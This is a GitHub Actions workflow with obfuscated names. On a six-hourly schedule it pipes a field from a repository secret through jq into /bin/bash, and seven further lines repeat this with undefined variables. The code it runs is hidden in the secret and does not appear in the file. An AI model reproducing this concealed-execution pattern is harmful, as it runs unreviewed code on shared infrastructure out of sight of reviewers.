name: liuqibuzhi

on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liuqibuzhi
        env:
          h2000: ${{ secrets.h2000 }}
        run: |
          echo $h2000 | jq -r .vitwi51 | /bin/bash
          echo $g4734 | jq -r .d1069 | /bin/bash
          echo $ieo68 | jq -r .uxez6139 | /bin/bash
          echo $wnv27 | jq -r .rheep276 | /bin/bash
          echo $vnx61 | jq -r .dxnfs96843 | /bin/bash
          echo $za3512 | jq -r .xf53311 | /bin/bash
          echo $mcpb99 | jq -r .x904 | /bin/bash
          echo $mwef6256 | jq -r .fjp89 | /bin/bash

